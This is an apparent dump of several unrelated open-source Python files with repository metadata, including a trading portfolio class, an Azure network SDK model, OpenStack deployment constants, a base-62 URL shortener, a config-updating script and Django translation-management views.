#Portfolio.__init__(self, Fut_AberrationSignal_Duo, engine, symbol_list, signal_param, Fut_AberrationSignal_Kong, signal_param)
#Portfolio.__init__(self, Fut_AberrationSignal_Duo, engine, symbol_list, signal_param, None, None)
Portfolio.__init__(self, Fut_AberrationSignal_Kong, engine, symbol_list, signal_param, None, None)
self.name = 'aberration'
#----------------------------------------------------------------------
def _bc_newSignal(self, signal, direction, offset, price, volume):
"""
对交易信号进行过滤,符合条件的才发单执行。
计算真实交易价格和数量。
"""
multiplier = self.portfolioValue * 0.01 / get_contract(signal.vtSymbol).size
multiplier = int(round(multiplier, 0))
#print(multiplier)
multiplier = 1
#print(self.posDict)
# 计算合约持仓
if direction == DIRECTION_LONG:
self.posDict[signal.vtSymbol] += volume*multiplier
else:
self.posDict[signal.vtSymbol] -= volume*multiplier
#print(self.posDict)
# 对价格四舍五入
priceTick = get_contract(signal.vtSymbol).price_tick
price = int(round(price/priceTick, 0)) * priceTick
self.engine._bc_sendOrder(signal.vtSymbol, direction, offset, price, volume*multiplier, self.name)
# 记录成交数据
trade = TradeData(self.result.date, signal.vtSymbol, direction, offset, price, volume*multiplier)
# l = self.tradeDict.setdefault(self.result.date, [])
# l.append(trade)
self.result.updateTrade(trade)
| [
"[email protected]"
]
| |
50faf2e04d91afe1be4128df90c192dd546b38fe | 50948d4cb10dcb1cc9bc0355918478fb2841322a | /azure-mgmt-network/azure/mgmt/network/v2018_06_01/models/application_gateway_probe.py | d04d03bf97211b720086089e3307cafdb95580c8 | [
"MIT"
]
| permissive | xiafu-msft/azure-sdk-for-python | de9cd680b39962702b629a8e94726bb4ab261594 | 4d9560cfd519ee60667f3cc2f5295a58c18625db | refs/heads/master | 2023-08-12T20:36:24.284497 | 2019-05-22T00:55:16 | 2019-05-22T00:55:16 | 187,986,993 | 1 | 0 | MIT | 2020-10-02T01:17:02 | 2019-05-22T07:33:46 | Python | UTF-8 | Python | false | false | 4,616 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .sub_resource import SubResource
class ApplicationGatewayProbe(SubResource):
"""Probe of the application gateway.
:param id: Resource ID.
:type id: str
:param protocol: The protocol used for the probe. Possible values are
'Http' and 'Https'. Possible values include: 'Http', 'Https'
:type protocol: str or
~azure.mgmt.network.v2018_06_01.models.ApplicationGatewayProtocol
:param host: Host name to send the probe to.
:type host: str
:param path: Relative path of probe. Valid path starts from '/'. Probe is
sent to <Protocol>://<host>:<port><path>
:type path: str
:param interval: The probing interval in seconds. This is the time
interval between two consecutive probes. Acceptable values are from 1
second to 86400 seconds.
:type interval: int
:param timeout: the probe timeout in seconds. Probe marked as failed if
valid response is not received with this timeout period. Acceptable values
are from 1 second to 86400 seconds.
:type timeout: int
:param unhealthy_threshold: The probe retry count. Backend server is
marked down after consecutive probe failure count reaches
UnhealthyThreshold. Acceptable values are from 1 second to 20.
:type unhealthy_threshold: int
:param pick_host_name_from_backend_http_settings: Whether the host header
should be picked from the backend http settings. Default value is false.
:type pick_host_name_from_backend_http_settings: bool
:param min_servers: Minimum number of servers that are always marked
healthy. Default value is 0.
:type min_servers: int
:param match: Criterion for classifying a healthy probe response.
:type match:
~azure.mgmt.network.v2018_06_01.models.ApplicationGatewayProbeHealthResponseMatch
:param provisioning_state: Provisioning state of the backend http settings
resource. Possible values are: 'Updating', 'Deleting', and 'Failed'.
:type provisioning_state: str
:param name: Name of the probe that is unique within an Application
Gateway.
:type name: str
:param etag: A unique read-only string that changes whenever the resource
is updated.
:type etag: str
:param type: Type of the resource.
:type type: str
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'protocol': {'key': 'properties.protocol', 'type': 'str'},
'host': {'key': 'properties.host', 'type': 'str'},
'path': {'key': 'properties.path', 'type': 'str'},
'interval': {'key': 'properties.interval', 'type': 'int'},
'timeout': {'key': 'properties.timeout', 'type': 'int'},
'unhealthy_threshold': {'key': 'properties.unhealthyThreshold', 'type': 'int'},
'pick_host_name_from_backend_http_settings': {'key': 'properties.pickHostNameFromBackendHttpSettings', 'type': 'bool'},
'min_servers': {'key': 'properties.minServers', 'type': 'int'},
'match': {'key': 'properties.match', 'type': 'ApplicationGatewayProbeHealthResponseMatch'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'etag': {'key': 'etag', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(self, **kwargs):
super(ApplicationGatewayProbe, self).__init__(**kwargs)
self.protocol = kwargs.get('protocol', None)
self.host = kwargs.get('host', None)
self.path = kwargs.get('path', None)
self.interval = kwargs.get('interval', None)
self.timeout = kwargs.get('timeout', None)
self.unhealthy_threshold = kwargs.get('unhealthy_threshold', None)
self.pick_host_name_from_backend_http_settings = kwargs.get('pick_host_name_from_backend_http_settings', None)
self.min_servers = kwargs.get('min_servers', None)
self.match = kwargs.get('match', None)
self.provisioning_state = kwargs.get('provisioning_state', None)
self.name = kwargs.get('name', None)
self.etag = kwargs.get('etag', None)
self.type = kwargs.get('type', None)
| [
"[email protected]"
]
| |
30aec9891a46dbbe643a92b765ac61393ad4a416 | 56bd9b3518f21080a0493f5330249bf5e85289fd | /engineering/common/econstants.py | 6c98788eeb4a4ac58e6294df9a553babe863a6f2 | [
"Apache-2.0"
]
| permissive | kevin-zhangsen/badam | da680bf8669722b5bc922381537bc4762fa5c228 | 6823f7dcd7c1b54c3b38edeffe59c16317598a2c | refs/heads/master | 2020-04-01T13:43:03.300155 | 2015-10-29T01:07:46 | 2015-10-29T01:07:46 | 45,371,347 | 2 | 0 | null | 2015-11-02T04:02:50 | 2015-11-02T04:02:47 | null | UTF-8 | Python | false | false | 7,858 | py | __author__ = 'nash.xiejun'
import os
class OperationType(object):
CFG_ALL_IN_ONE = 'cfg-all-in-one'
CFG_HOST_NAME = 'cfg-hostname'
DEPLOY_CASCADING = 'deploy-cascade-openstack'
DEPLOY_HYBRID_CLOUD = 'deploy-hybrid-cloud'
class EndpointType(object):
COMPUTE = 'compute'
VOLUME = 'volume'
VOLUME2 = 'volumev2'
IMAGE = 'image'
NETWORK = 'network'
ORCHESTRATION = 'orchestration'
EC2 = 'ec2'
METERING = 'metering'
class EndpointURL(object):
COMPUTE = 'http://%s:8774/v2/$(tenant_id)s'
VOLUME = 'http://%s:8776/v1/$(tenant_id)s'
VOLUME2 = 'http://%s:8776/v2/$(tenant_id)s'
IMAGE = 'http://%s:9292/'
NETWORK = 'http://%s:9696/'
ORCHESTRATION = 'http://%s:8004/v1/$(tenant_id)s'
EC2 = 'http://%s:8773/services/Cloud'
METERING = 'http://%s:8777/'
class ServiceName(object):
NOVA = 'nova'
CINDER = 'cinder'
GLANCE = 'glance'
NEUTRON = 'neutron'
KEYSTONE = 'keystone'
class PathConfigFile(object):
ROOT = os.path.sep
ETC = 'etc'
PLUGINS = 'plugins'
ML_2 = 'ml2'
ML2_CONF = 'ml2_conf.ini'
NOVA_CONF = 'nova.conf'
#etc/nova/nova.conf
NOVA = os.path.join(ETC, ServiceName.NOVA, NOVA_CONF)
NOVA_COMPUTE_CONF = 'nova-compute.conf'
#etc/nova/nova-compute.conf
NOVA_COMPUTE = os.path.join(ETC, ServiceName.NOVA, NOVA_COMPUTE_CONF)
NEUTRON_CONF = 'neutron.conf'
#etc/neutron/neutron.conf
NEUTRON = os.path.join(ETC, ServiceName.NEUTRON, NEUTRON_CONF)
# etc/neutron/plugins/ml2/ml2_conf.ini
ML2 = os.path.join(ETC, ServiceName.NEUTRON, PLUGINS, ML_2, ML2_CONF)
L3_PROXY_INI = 'l3_proxy.ini'
# etc/neutron/l3_proxy.ini
L3_PROXY = os.path.join(ETC, ServiceName.NEUTRON, L3_PROXY_INI)
#etc/keystone/keystone.conf
KEYSTONE_CONF = 'keystone.conf'
KEYSTONE = os.path.join(ETC, ServiceName.KEYSTONE, KEYSTONE_CONF)
#etc/glance/glance.conf
GLANCE_CONF = 'glance.conf'
GLANCE = os.path.join(ETC, ServiceName.GLANCE, GLANCE_CONF)
#etc/cinder/cinder.conf
CINDER_CONF = 'cinder.conf'
CINDER = os.path.join(ETC, ServiceName.CINDER, CINDER_CONF)
class PathTriCircle(object):
TRICIRCLE = 'tricircle-master'
JUNO_PATCHES = 'juno-patches'
NOVA_PROXY = 'novaproxy'
CINDER_PROXY = 'cinderproxy'
NEUTRON_PROXY = 'neutronproxy'
L2_PROXY = 'l2proxy'
L3_PROXY = 'l3proxy'
GLANCE_SYNC = 'glancesync'
GLANCE_STORE = 'glance_store'
PATCH_CINDER_CASCADED_TIMESTAMP = 'timestamp-query-patch'
PATCH_GLANCE_LOCATION = 'glance_location_patch'
PATCH_GLANCE_STORE = 'glance_store_patch'
PATCH_NEUTRON_CASCADED_BIG2LAYER = 'neutron_cascaded_big2layer_patch'
PATCH_NEUTRON_CASCADED_L3 = 'neutron_cascaded_l3_patch'
PATCH_NEUTRON_CASCADED_TIMESTAMP = 'neutron_timestamp_cascaded_patch'
PATCH_NEUTRON_CASCADING_BIG2LAYER = 'neutron_cascading_big2layer_patch'
PATCH_NEUTRON_CASCADING_L3 = 'neutron_cascading_l3_patch'
PATCH_NOVA_SCHEDULING = 'nova_scheduling_patch'
# tricircle-master/glancesync
PATH_CASCADING_GLANCE_SYNC = os.path.join(TRICIRCLE, GLANCE_SYNC)
# tricircle-master/cinderproxy
PATH_PROXY_CINDER = os.path.join(TRICIRCLE, CINDER_PROXY)
# tricircle-master/neutronproxy/l2proxy
PATH_PROXY_NEUTRON_L2 = os.path.join(TRICIRCLE, NEUTRON_PROXY, L2_PROXY)
# tricircle-master/neutronproxy/l3proxy
PATH_PROXY_NEUTRON_L3 = os.path.join(TRICIRCLE, NEUTRON_PROXY, L3_PROXY)
# tricircle-master/novaproxy
PATH_PROXY_NOVA = os.path.join(TRICIRCLE, NOVA_PROXY)
# tricircle-master/juno-patches/cinder/timestamp-query-patch
PATH_PATCH_CINDER_CASCADED_TIMESTAMP = os.path.join(TRICIRCLE, JUNO_PATCHES, ServiceName.CINDER, PATCH_CINDER_CASCADED_TIMESTAMP)
# tricircle-master/juno-patches/glance/glance_location_patch
PATH_PATCH_GLANCE_LOCATION = os.path.join(TRICIRCLE, JUNO_PATCHES, ServiceName.GLANCE, PATCH_GLANCE_LOCATION)
# tricircle-master/juno-patches/glance_store/glance_store_patch/
PATH_PATCH_GLANCE_STORE = os.path.join(TRICIRCLE, JUNO_PATCHES, GLANCE_STORE, PATCH_GLANCE_STORE)
# tricircle-master/juno-patches/neutron/neutron_cascaded_big2layer_patch
PATH_PATCH_NEUTRON_CASCADED_BIG2LAYER = os.path.join(TRICIRCLE, JUNO_PATCHES, ServiceName.NEUTRON, PATCH_NEUTRON_CASCADED_BIG2LAYER)
# tricircle-master/juno-patches/neutron/neutron_cascaded_l3_patch
PATH_PATCH_NEUTRON_CASCADED_L3 = os.path.join(TRICIRCLE, JUNO_PATCHES, ServiceName.NEUTRON, PATCH_NEUTRON_CASCADED_L3)
# tricircle-master/juno-patches/neutron/neutron_cascading_big2layer_patch
PATH_PATCH_NEUTRON_CASCADING_BIG2LAYER = os.path.join(TRICIRCLE, JUNO_PATCHES, ServiceName.NEUTRON, PATCH_NEUTRON_CASCADING_BIG2LAYER)
# tricircle-master/juno-patches/neutron/neutron_cascading_l3_patch
PATH_PATCH_NEUTRON_CASCADING_L3 = os.path.join(TRICIRCLE, JUNO_PATCHES, ServiceName.NEUTRON, PATCH_NEUTRON_CASCADING_L3)
# tricircle-master/juno-patches/neutron/neutron_timestamp_cascaded_patch
PATH_PATCH_NEUTRON_CASCADED_TIMESTAMP = os.path.join(TRICIRCLE, JUNO_PATCHES, ServiceName.NEUTRON, PATCH_NEUTRON_CASCADED_TIMESTAMP)
# tricircle-master/juno-patches/nova/nova_scheduling_patch
PATH_PATCH_NOVA_SCHEDULING = os.path.join(TRICIRCLE, JUNO_PATCHES, ServiceName.NOVA, PATCH_NOVA_SCHEDULING)
PATCH_TO_PATH = {
PATCH_NOVA_SCHEDULING : PATH_PATCH_NOVA_SCHEDULING,
PATCH_NEUTRON_CASCADING_BIG2LAYER : PATH_PATCH_NEUTRON_CASCADING_BIG2LAYER,
PATCH_NEUTRON_CASCADING_L3 : PATH_PATCH_NEUTRON_CASCADING_L3,
PATCH_NEUTRON_CASCADED_BIG2LAYER : PATH_PATCH_NEUTRON_CASCADED_BIG2LAYER,
PATCH_NEUTRON_CASCADED_L3 : PATH_PATCH_NEUTRON_CASCADED_L3,
PATCH_NEUTRON_CASCADED_TIMESTAMP : PATH_PATCH_NEUTRON_CASCADED_TIMESTAMP,
PATCH_CINDER_CASCADED_TIMESTAMP : PATH_PATCH_CINDER_CASCADED_TIMESTAMP,
NOVA_PROXY : PATH_PROXY_NOVA,
CINDER_PROXY : PATH_PROXY_CINDER,
L2_PROXY : PATH_PROXY_NEUTRON_L2,
L3_PROXY : PATH_PROXY_NEUTRON_L3
}
class PathHybridCloud(object):
HYBRID_CLOUD_PATCHES = 'hybrid_cloud_patches'
THIRD_LIB = '3rd_lib'
PYTHON = 'python'
JAVA = 'java'
OPENSTACK_DASHBOARD = 'openstack_dashboard'
WSGI = 'wsgi'
ROOT = os.path.sep
#/usr/share/openstack-dashboard/openstack_dashboard/
# hybrid_cloud_patches/3rd_lib/java
PATH_THIRD_LIB_JAVA = os.path.join(HYBRID_CLOUD_PATCHES, THIRD_LIB, JAVA)
# hybrid_cloud_patches/3rd_lib/python
PATH_THIRD_LIB_PYTHON = os.path.join(HYBRID_CLOUD_PATCHES, THIRD_LIB, PYTHON)
# hybrid_cloud_patches/java
PATH_PATCHES_JAVA = os.path.join(HYBRID_CLOUD_PATCHES, JAVA)
# hybrid_cloud_patches/python
PATH_PATCHES_PYTHON = os.path.join(HYBRID_CLOUD_PATCHES, PYTHON)
# hybrid_cloud_patches/wsgi
PATH_PATCHES_OPENSTACK_DASHBOARD = os.path.join(HYBRID_CLOUD_PATCHES, WSGI)
# /usr/share/openstack-dashboard/
PATH_INSTALL_PATCH_OPENSTACK_DASHBOARD = ''.join([ROOT, os.path.join('usr', 'share', 'openstack-dashboard')])
class PathTricircleConfigFile(object):
PROXY_CINDER = os.path.join(PathTriCircle.PATH_PROXY_CINDER, PathConfigFile.CINDER)
PROXY_NEUTRON_L2 = os.path.join(PathTriCircle.PATH_PROXY_NEUTRON_L2, PathConfigFile.ML2)
PROXY_NEUTRON_L3 = os.path.join(PathTriCircle.PATH_PROXY_NEUTRON_L3, PathConfigFile.L3_PROXY)
PROXY_NOVA_COMPUTE = os.path.join(PathTriCircle.PATH_PROXY_NOVA, PathConfigFile.NOVA_COMPUTE)
PROXY_NOVA = os.path.join(PathTriCircle.PATH_PROXY_NOVA, PathConfigFile.NOVA)
class ConfigReplacement(object):
REGION_NAME = 'region_name'
CASCADED_NODE_IP = 'cascaded_node_ip'
CASCADING_NODE_IP = 'cascading_node_ip'
CINDER_TENANT_ID = 'cinder_tenant_id'
AVAILABILITY_ZONE = 'availability_zone'
CASCADING_OS_REGION_NAME = 'cascading_os_region_name'
ML2_LOCAL_IP = 'ml2_local_ip' | [
"[email protected]"
]
| |
200a81f58579323116fcf06d8ac860193ba85b33 | c954904d3a3259f0bee4bc3942998c30f4714e68 | /shortener/shorturl/__init__.py | 841083c46d1e89eca6a52cddcb079e6658197c16 | []
| no_license | Alodhaib/django-shortener-example | 9443e51191086fa1321468eb3fdefa137c25e330 | d037c913ed18e0a7b24865b7f4f5aaf68df2cca3 | refs/heads/master | 2021-01-24T10:06:40.965556 | 2013-05-11T16:01:13 | 2013-05-11T16:01:13 | 69,673,280 | 0 | 0 | null | 2016-09-30T14:22:22 | 2016-09-30T14:22:22 | null | UTF-8 | Python | false | false | 2,822 | py | #!/usr/bin/env python
#
# Converts any integer into a base [BASE] number. I have chosen 62
# as it is meant to represent the integers using all the alphanumeric
# characters, [no special characters] = {0..9}, {A..Z}, {a..z}
#
# I plan on using this to shorten the representation of possibly long ids,
# a la url shortenters
#
# saturate() takes the base 62 key, as a string, and turns it back into an integer
# dehydrate() takes an integer and turns it into the base 62 string
#
import math
import sys
BASE = 62
UPPERCASE_OFFSET = 55
LOWERCASE_OFFSET = 61
DIGIT_OFFSET = 48
def true_ord(char):
"""
Turns a digit [char] in character representation
from the number system with base [BASE] into an integer.
"""
if char.isdigit():
return ord(char) - DIGIT_OFFSET
elif 'A' <= char <= 'Z':
return ord(char) - UPPERCASE_OFFSET
elif 'a' <= char <= 'z':
return ord(char) - LOWERCASE_OFFSET
else:
raise ValueError("%s is not a valid character" % char)
def true_chr(integer):
"""
Turns an integer [integer] into digit in base [BASE]
as a character representation.
"""
if integer < 10:
return chr(integer + DIGIT_OFFSET)
elif 10 <= integer <= 35:
return chr(integer + UPPERCASE_OFFSET)
elif 36 <= integer < 62:
return chr(integer + LOWERCASE_OFFSET)
else:
raise ValueError("%d is not a valid integer in the range of base %d" % (integer, BASE))
def saturate(key):
"""
Turn the base [BASE] number [key] into an integer
"""
int_sum = 0
reversed_key = key[::-1]
for idx, char in enumerate(reversed_key):
int_sum += true_ord(char) * int(math.pow(BASE, idx))
return int_sum
def dehydrate(integer):
"""
Turn an integer [integer] into a base [BASE] number
in string representation
"""
# we won't step into the while if integer is 0
# so we just solve for that case here
if integer == 0:
return '0'
string = ""
while integer > 0:
remainder = integer % BASE
string = true_chr(remainder) + string
integer /= BASE
return string
if __name__ == '__main__':
# not really unit tests just a rough check to see if anything is way off
if sys.argv[1] == '-tests':
passed_tests = True
for i in xrange(0, 1000):
passed_tests &= (i == saturate(dehydrate(i)))
print passed_tests
else:
user_input = sys.argv[2]
try:
if sys.argv[1] == '-s':
print saturate(user_input)
elif sys.argv[1] == '-d':
print dehydrate(int(user_input))
else:
print "I don't understand option %s" % sys.argv[1]
except ValueError as e:
print e | [
"[email protected]"
]
| |
6b8e063df39d1bc4647cc63b5d37bbb741026f94 | 84856442c382b0b670246636d378beb095effa0a | /dev_cloud/cc1/pkg/node/usr/sbin/cc1_node_update_config | e017f54f299318ea27deee56590d47e9bbbd9034 | [
"Apache-2.0",
"LicenseRef-scancode-philippe-de-muyter"
]
| permissive | Dev-Cloud-Platform/Dev-Cloud | f50cc3292245156c4cf55942e4426fda22443fd6 | b2fb9f4318aeb6dde1e8babca32da527943f1fb4 | refs/heads/master | 2020-12-29T02:43:14.022401 | 2017-05-05T07:18:21 | 2017-05-05T07:18:21 | 28,969,864 | 1 | 1 | null | 2015-01-14T16:46:57 | 2015-01-08T14:36:52 | Python | UTF-8 | Python | false | false | 1,615 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# @cond LICENSE
#
# Copyright [2010-2013] Institute of Nuclear Physics PAN, Krakow, Poland
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# @endcond LICENSE
"""
@author Maciej Nabozny <[email protected]>
"""
import sys
def set_value(key, value):
print "NODE: Updating config: %s:%s" % (key, value)
config = open('/etc/cc1/node/config.py', 'r')
lines = []
for line in config.readlines():
if line[-1] == '\n':
line = line[:-1]
if line.startswith(key):
lines.append(key + '="' + str(value) + '"')
else:
lines.append(line)
config.close()
config = open('/etc/cc1/node/config.py', 'w')
config.write('\n'.join(lines))
config.close()
return 0
if __name__ == "__main__":
try:
if len(sys.argv) == 3:
sys.exit(set_value(sys.argv[1], sys.argv[2]))
else:
print "Usage: %s [key] new_value" % sys.argv[0]
sys.exit(1)
except Exception as e:
print >> sys.stderr, "ERROR: %s" % str(e)
sys.exit(10)
| [
"[email protected]"
]
| ||
9ebffdc2c7a97a1fcd82205153e8ae6ff5acd96a | 4dbdcdd777897567ede8343299b5dacf59580479 | /translations/views.py | 9cffdce4a4af841a082619776557b448ebeada5a | [
"BSD-3-Clause"
]
| permissive | OpenTTD-Ladder/yawd-translations | 88cae158d561034ca6e69311fb8be9acc2b73627 | 913025f4361883408ca480a8e7c9ea90add0a9db | refs/heads/master | 2021-01-15T20:12:59.548959 | 2013-07-19T09:06:07 | 2013-07-19T09:06:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,508 | py | import os, shutil
from django.conf import settings
from django.contrib import messages
from django.core.exceptions import PermissionDenied
from django.core.management.commands.compilemessages import has_bom
from django.core.management.commands.makemessages import make_messages, handle_extensions
from django.http import Http404
from django.http import HttpResponseRedirect
from django.utils.encoding import smart_str
from django.utils.importlib import import_module
from django.utils.text import capfirst
from django.utils.translation import to_locale, ugettext as _
from django.views.generic import TemplateView, FormView
from forms import PoFileForm
from models import Language
from utils import compile_message_file, concat_message_files, reset_translations
class GenerateTranslationMessagesView(TemplateView):
template_name ='admin/includes/translation_messages_list.html'
def get(self, request, *args, **kwargs):
if not request.is_ajax():
raise Http404
if not request.user.has_perm('translations.edit_translations'):
raise PermissionDenied
try:
self.language = Language.objects.get(name=args[0])
self.locale = to_locale(self.language.name)
except Language.DoesNotExist:
raise Http404
if settings.LOCALE_PATHS:
#check if the folder for this language exists and attempt to create it if id does not exist
self.po_path = os.path.join(settings.LOCALE_PATHS[0], self.locale, 'LC_MESSAGES')
if not os.path.exists(self.po_path):
try:
os.makedirs(self.po_path)
except:
self.error = _('Could not create the target folder.')
else:
self.error = _('<b>Configuration error!</b> Please set the LOCALE_PATHS project setting to allow the creation of a unified messages catalog.')
#delete files if requested
if request.GET.get('delete', 0):
for f in os.listdir(self.po_path):
if f.endswith('.po') or f.endswith('.mo'):
os.unlink(os.path.join(self.po_path, f))
context = self.get_context_data(**kwargs)
return self.render_to_response(context)
def get_context_data(self, **kwargs):
context = super(GenerateTranslationMessagesView, self).get_context_data(**kwargs)
if hasattr(self, 'error') and self.error:
context['error'] = self.error
return context
#locate the current directory
curr_dir = os.curdir
domain_dict = {'django' : ['html','txt'], 'djangojs' : ['js']}
lang_files = []
#iterate over the installed applications and copy their po files
#for this language to the appropriate folder
for app_name in settings.INSTALLED_APPS:
mod = import_module(app_name)
mod_root = os.path.dirname(mod.__file__)
if not os.path.exists(os.path.join(mod_root, 'locale')):
continue
original_path = os.path.join(mod_root, 'locale', to_locale(self.language.name), 'LC_MESSAGES')
delete_at_the_end = False
if not os.path.exists(original_path):
if not app_name.startswith('django.contrib'):
try: #try to create language directory for the app
os.makedirs(original_path)
delete_at_the_end = True
except:
continue
else:
continue
if not app_name.startswith('django.contrib'):
#move original files to a temp file
for file_ in list(os.listdir(original_path)):
if file_.endswith('.po'):
shutil.copy(os.path.join(original_path, file_), os.path.join(original_path, 'original-%s' % file_))
#copy the project-wise files to the appropriate directory
if not self.request.GET.get('delete', 0):
#replace original file with the yawd version
#so that it gets updated
for f in list(os.listdir(self.po_path)):
if f.startswith('%s-' % app_name) and f.endswith('.po'):
shutil.copy(os.path.join(self.po_path, f), os.path.join(original_path, f.replace('%s-' % app_name, '')))
#makemessages excluding the core applications
os.chdir(mod_root)
for key, value in domain_dict.items():
make_messages(locale=self.locale, domain=key, extensions=handle_extensions(value), verbosity=0)
os.chdir(curr_dir)
#iterate over the application po files
for file_ in list(os.listdir(original_path)):
if not file_.startswith('original-') and file_.endswith('.po'):
original_file_path = os.path.join(original_path, file_)
file_name = '%s-%s' % (app_name, file_)
#copy file
copy_path = os.path.join(self.po_path, file_name)
if self.request.GET.get('delete', 0) or not (app_name.startswith('django.contrib') and os.path.exists(copy_path)):
shutil.copy(original_file_path, copy_path)
os.chmod(copy_path, 0664)
#unlink updated file
if not app_name.startswith('django.contrib'):
os.unlink(original_file_path)
lang_files.append(file_name)
if not app_name.startswith('django.contrib'):
if delete_at_the_end:
shutil.rmtree(os.path.join(mod_root, 'locale', to_locale(self.language.name)))
else:
for file_ in os.listdir(original_path):
#put back the original application files
if file_.startswith('original-') and file_.endswith('.po'):
shutil.move(os.path.join(original_path, file_), os.path.join(original_path, file_.replace('original-','')))
#concat all messages in a single .po file for each domain
for domain in domain_dict:
file_name = '%s.po' % domain
uni_django_path = os.path.join(self.po_path, file_name)
if os.path.exists(uni_django_path):
os.unlink(uni_django_path)
source_files = [os.path.join(self.po_path, f) for f in lang_files if f.endswith(file_name)]
if source_files:
#merge .po files
concat_message_files(source_files, uni_django_path)
#compile django.po
if not has_bom(uni_django_path):
compile_message_file(uni_django_path)
#reset the cached translation messages so that
#we do not need to restart the web server
reset_translations(self.language.name)
context['lang_files'] = sorted(lang_files)
return context
class TranslationMessagesView(TemplateView):
template_name = 'admin/translation_messages.html'
def get(self, request, *args, **kwargs):
if not request.user.has_perm('translations.view_translations'):
raise PermissionDenied
try:
self.language = Language.objects.get(name=args[0])
self.locale = to_locale(self.language.name)
except Language.DoesNotExist:
raise Http404
context = self.get_context_data(**kwargs)
return self.render_to_response(context)
def get_context_data(self, **kwargs):
context = super(TranslationMessagesView, self).get_context_data(**kwargs)
opts = self.language._meta
context['title'] = _('Translate Static Messages')
context['language'] = self.language
context['opts'] = opts
#add permission context variables
context['has_change_permission'] = self.request.user.has_perm(opts.app_label + '.' + opts.get_change_permission())
context['has_change_object_permission'] = self.request.user.has_perm(opts.app_label + '.' + opts.get_change_permission(), self.language.pk)
if not settings.LOCALE_PATHS:
context['error'] = _('<b>Configuration error!</b> Please set the LOCALE_PATHS project setting to allow the creation of a unified messages catalog.')
return context
context['lang_files'] = []
po_path = os.path.join(settings.LOCALE_PATHS[0], self.locale, 'LC_MESSAGES')
if os.path.exists(po_path):
for file_ in os.listdir(po_path):
if file_.endswith('.po') and not file_ in ['django.po', 'djangojs.po']:
context['lang_files'].append(file_)
context['lang_files'].sort()
if not os.path.exists(po_path) or not context['lang_files']:
context['warning'] = _('The system does not appear to have any translation messages for this language. Please use the "Generate messages" button.')
return context
class TranslationMessagesEditView(FormView):
template_name = 'admin/edit_translation_messages.html'
form_class = PoFileForm
success_url = '../'
def dispatch(self, request, *args, **kwargs):
"""
Overridden dispatch method to check if user has the right to edit
the .po file.
"""
if not request.user.has_perm('translations.edit_translations'):
raise PermissionDenied
return super(TranslationMessagesEditView, self).dispatch(request, *args, **kwargs)
def get_initial(self):
"""
Attempt to load the .po file and put its contents in the form's
initial data
"""
try:
self.language = Language.objects.get(name=self.args[0])
except Language.DoesNotExist:
raise Http404
if settings.LOCALE_PATHS:
#check if the folder for this language exists and attempt to create it if id does not exist
self.po_path = os.path.join(settings.LOCALE_PATHS[0], to_locale(self.language.name), 'LC_MESSAGES')
else:
raise Http404
self.po_file = self.args[1]
try:
file_ = open(os.path.join(self.po_path, self.po_file), 'r')
contents = file_.read()
file_.close()
return { 'po_content' : contents }
except:
raise Http404
def get_context_data(self, **kwargs):
context = super(TranslationMessagesEditView, self).get_context_data(**kwargs)
opts = self.language._meta
context['title'] = u'%s %s' % (_('Edit'), self.po_file)
context['language'] = self.language
context['opts'] = opts
#add permission context variables
context['has_delete_permission'] = False
context['has_add_permission'] = False
context['has_change_permission'] = self.request.user.has_perm(opts.app_label + '.' + opts.get_change_permission())
context['has_change_object_permission'] = self.request.user.has_perm(opts.app_label + '.' + opts.get_change_permission(), self.language.pk)
context['change'] = True
context['is_popup'] = False
context['save_as'] = False
return context
def form_valid(self, form):
try:
file_path = os.path.join(self.po_path, self.po_file)
file_ = open(file_path, 'w+')
file_.write(smart_str(form.cleaned_data['po_content']))
file_.close()
domain = 'django.po' if self.po_file.endswith('django.po') else 'djangojs.po'
uni_django_path = os.path.join(self.po_path, domain)
source_files = []
#iterate over the installed applications, locate & concat
#the corresponding global django.po or djangojs.po file
for app_name in settings.INSTALLED_APPS:
local_django = os.path.join(self.po_path, '%s-%s' % (app_name, domain))
if os.path.exists(local_django):
source_files.append(local_django)
concat_message_files(source_files, uni_django_path)
if not has_bom(uni_django_path):
compile_message_file(uni_django_path)
#reset the cached translation messages so that
#we do not need to restart the web server
reset_translations(self.language.name)
messages.add_message(self.request, messages.SUCCESS, _(('The file %(file)s was succesfuly updated.' % { 'file' : self.po_file })))
except:
messages.add_message(self.request, messages.ERROR, _(('The file %(file)s could not be saved.' % { 'file' : self.po_file })))
#save and continue editing
if "_continue" in self.request.POST:
return HttpResponseRedirect('../%s' % self.po_file)
return super(TranslationMessagesEditView, self).form_valid(form)
| [
"[email protected]"
]
| |
71bc398215f05023c66de7b67055c6c4452211b3 | 71dfa5d568d408fd8464a1313f87c1133e3d061c | /ATS/urls.py | b3d6e11901bbb899f6983c3d21e1d181763c2df1 | []
| no_license | harshdonga/Alumni-Tracking-System | 3819e26e82145ca2cf277c1f260494cb6a6fbd4c | f0c836d5fb405f8b61fb73d78acc4c47802a9c11 | refs/heads/master | 2020-12-29T17:48:13.989148 | 2020-02-07T04:27:59 | 2020-02-07T04:27:59 | 238,687,836 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 165 | py | from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('admin/', admin.site.urls),
path('', include('alumni.urls')),
]
| [
"[email protected]"
]
| |
5c107d3057995ffc314bc3eebe9f4fdb39227a36 | 321e58ab3e6b2385bb3549aaaefd56a58c2a51e7 | /python/atpic/atcookies.py | 1d2ea4668a4d530a17d2d2233e73e24b0279454c | []
